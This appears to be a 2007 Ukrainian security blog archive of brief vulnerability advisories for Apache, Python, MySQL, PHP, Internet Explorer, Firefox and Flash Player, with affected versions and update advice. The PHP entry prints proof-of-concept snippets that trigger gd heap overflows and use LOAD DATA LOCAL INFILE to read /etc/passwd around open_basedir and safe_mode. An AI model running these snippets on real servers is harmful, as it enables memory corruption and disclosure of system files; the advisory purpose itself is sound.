Архів для категорії 'Помилки'

Міжсайтовий скриптінг в Apache

19:42 01.10.2007

Виявлений міжсайтовий скриптінг в Apache (Cross-Site Scripting).

Уразливі версії: Apache 2.2.

Можливий міжсайтовий скриптінг із використанням UTF-7 при генерації діагностичних повідомлень.

  • Apache2 Undefined Charset UTF-7 XSS Vulnerability (деталі)

Цілочислене переповнення в модулі imageop Python

22:19 25.09.2007

Виявлена уразливість в Python в модулі imageop. Уразливі версії: Python 2.5.

В модулі виявлене цілочислене переповнення в функції imageop.tovideo (integer overflow).

  • python <= 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module (деталі)

Уразливість при обробці IF запитів в MySQL

18:36 21.09.2007

Виявлена уразливість при обробці IF запитів в MySQL, яка дозволяє віддаленому користувачу викликати відмову в обслуговуванні БД.

Уразливі версії: MySQL версії до 5.0.40.

Уразливість існує через помилку при обробці спеціально сформованих IF запитів. Віддалений користувач може за допомогою IF запиту аварійно завершити роботу додатка.

  • Уязвимость при обработке IF запросов в MySQL (деталі)

Вийшов новий Apache

19:49 19.09.2007

Apache Software Foundation випустила нові версії HTTP-сервера Apache - 2.0.61 і 2.2.6, у яких усунуті п’ять уразливостей і виправлений ряд помилок.

Зокрема, закриті уразливості до відмови в обслуговуванні в модулях mod_proxy, mod_cache і mod_mem_cache, що дозволяли аварійно завершити сервер за допомогою спеціально сформованих шкідливих запитів. У той же час усунута уразливість до міжсайтового скриптінгу в mod_status і уразливість до відмови в обслуговуванні в модулі Prefork MPM. Розробники радять оновити веб сервери на нові версії.

По матеріалам http://www.secblog.info.

DoS проти mod_proxy в Apache

19:15 15.09.2007

В mod_proxy можливий Denial of Service. Уразливі версії: Apache 2.3.

Уразливість в модулі пов’язана з читанням за межами буфера при розборі відповіді сервера.

Численні уразливості в PHP

19:47 07.09.2007

Виявленні численні уразливості в PHP. Уразливі версії: PHP 5.2.x.

Знайдені уразливості дозволяють віддаленому користувачу обійти деякі обмеження безпеки.

1. Уразливість існує через невідому помилку у функції “money_format()” при обробці токенів “%i” та “%n”.

2. Уразливість існує через невідому помилку у функції “zend_alter_ini_entry()”. Зловмисник може викликати memory_limit переривання.

3. Цілочисленне переповнення виявлене у функціях “gdImageCreate()” і “gdImageCreateTrueColor()” у файлі ext/gd/libgd/gd.c. Зловмисник може за допомогою занадто великих цілочисленних значень, переданих як параметр PHP функції “imagecreatetruecolor()” викликати переповнення динамічної пам’яті. Віддалений користувач може виконати довільний код на цільовій системі чи обійти обмеження безпеки (наприклад, директиву “disable_functions”). Для успішної експлуатації уразливості PHP повинен бути налаштований для використання бібліотеки gd. Приклад:

<?php
imagecreatetruecolor(1234,1073741824);
?>

4. Два цілочисленних переповнення виявлені у функції “gdImageCopyResized()” у файлі ext/gd/libgd/gd.c. Зловмисник може за допомогою занадто великих цілочисленних значень, переданих як параметр PHP функціям “imagecopyresized()” і “imagecopyresampled()” викликати переповнення динамічної пам’яті. Віддалений користувач може виконати довільний код на цільовій системі чи обійти обмеження безпеки (наприклад, директиву “disable_functions”). Для успішної експлуатації уразливості PHP повинен бути налаштований для використання бібліотеки gd. Приклад:

<?php
imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),
imagecreatetruecolor(120, 120),
0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
?>

5. Уразливість існує через помилку при обробці SQL запитів, що містять “LOCAL INFILE” усередині MySQL і MySQLi розширень. Зловмисник може обійти обмеження директив “open_basedir” і “safe_mode”. Приклад:

MySQL:

<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l);
mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>

MySQLi:

<?php
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>

6. Уразливість існує через помилку при обробці функцій “session_save_path()” та “ini_set()”, викликуваних з “.htaccess” файлу. Зловмисник може обійти обмеження директив “open_basedir” і “safe_mode”.

7. Уразливість існує через невідому помилку у функції “glob()”. Зловмисник може обійти обмеження директиви “open_basedir”.

8. Уразливість існує через невідому помилку при обробці сесій. Зловмисник може замінити сесійний файл символічною лінкою і обійти обмеження директиви “open_basedir”.

Рекомендується встановити останню версію 5.2.4 із сайта виробника.

  • Множественные уязвимости в PHP (деталі)

Уразливість перетаскування файлів в Internet Explorer

19:42 03.09.2007

Виявлена уразливість перетаскування файлів в Internet Explorer (drag-n-drop vulnerability).

Уразливі версії: Microsoft Internet Explorer 5.5, Microsoft Internet Explorer 6.0.

Використовуючи javascript у сполученні з shell:startup можливо помістити будь-який файл у папку автозапуску при перетаскуванні об’єкта чи прокрутці сторінки.

Виконання довільних команд в Mozilla Firefox

22:28 30.08.2007

Виявлена можливість виконання довільних команд в Mozilla Firefox. Уразливість дозволяє віддаленому користувачу виконати довільні команди на цільовому комп’ютері.

Уразливі версії: Mozilla Firefox 2.0.0.5, можливо більш ранні версії.

Уразливість існує через недостатню перевірку вхідних даних у різних URI оброблювачах. Віддалений користувач може за допомогою спеціально сформованої веб сторінки виконати довільні команди на цільовій системі.

В якості виправлення для даної уразливості рекомендується вимкнути непотрібні оброблювачі URI (або оновити браузер до версії 2.0.0.6). В налаштуваннях FF, в about:config, потрібно встановити значення false для наступних параметрів: network.protocol-handler.external.news, network.protocol-handler.external.snews, network.protocol-handler.external.mailto, network.protocol-handler.external.nntp.

До речі, як я писав, в новій версії Firefox 2.0.0.6 вже також були знайдені уразливості.

  • Выполнение произвольных команд в Mozilla Firefox (деталі)

Декілька уразливостей в Adobe Flash Player

20:32 27.08.2007

Виявлено декілька уразливостей в Adobe Flash Player. Знайдені уразливості дозволяють віддаленому користувачу одержати доступ до важливих даних і скомпрометувати цільову систему.

Уразливі версії: Adobe Flash Player 9.x, Macromedia Flash Player 7.x, Macromedia Flash Player 8.x.

1. Уразливість існує через помилку при обробці вхідних даних. Віддалений користувач може за допомогою спеціально сформованої веб сторінки виконати довільний код на цільовій системі. Уразливості піддаються версія 9.0.45.0 і більш ранні.

2. Уразливість існує через помилку у взаємодії Flash Player з деякими браузерами. Віддалений користувач може за допомогою спеціально сформованої веб сторінки перехопити натискання клавіш і переслати їх Flash Player апплету. Уразливості піддаються версія 7.0.69.0 і більш ранні на платформах Linux і Solaris.

3. Уразливість існує через недостатню обробку HTTP Referer. Віддалений користувач може виконати CSRF атаку. Уразливість існує в 8.0.34.0 і більш ранніх версіях.

Всім користувачам рекомендується встановити останню версію Flash Player 9.0.47.0.

  • Несколько уязвимостей в Adobe Flash Player (деталі)

Підміна адресного рядка в Microsoft Internet Explorer

19:37 21.08.2007

Виявлена можливість підміни адресного рядка в IE. Уразливість дозволяє віддаленому користувачу виконати спуфінг атаку.

Уразливі версії: Microsoft Internet Explorer 7, можливо більш ранні версії.

Уразливість існує через помилку при обробці методу “document.open()”. Віддалений користувач може за допомогою спеціально сформованої веб сторінки підмінити вміст сайта, якщо користувач набере URL вручну в адресному рядку.

  • Подмена адресной строки в Microsoft Internet Explorer (деталі)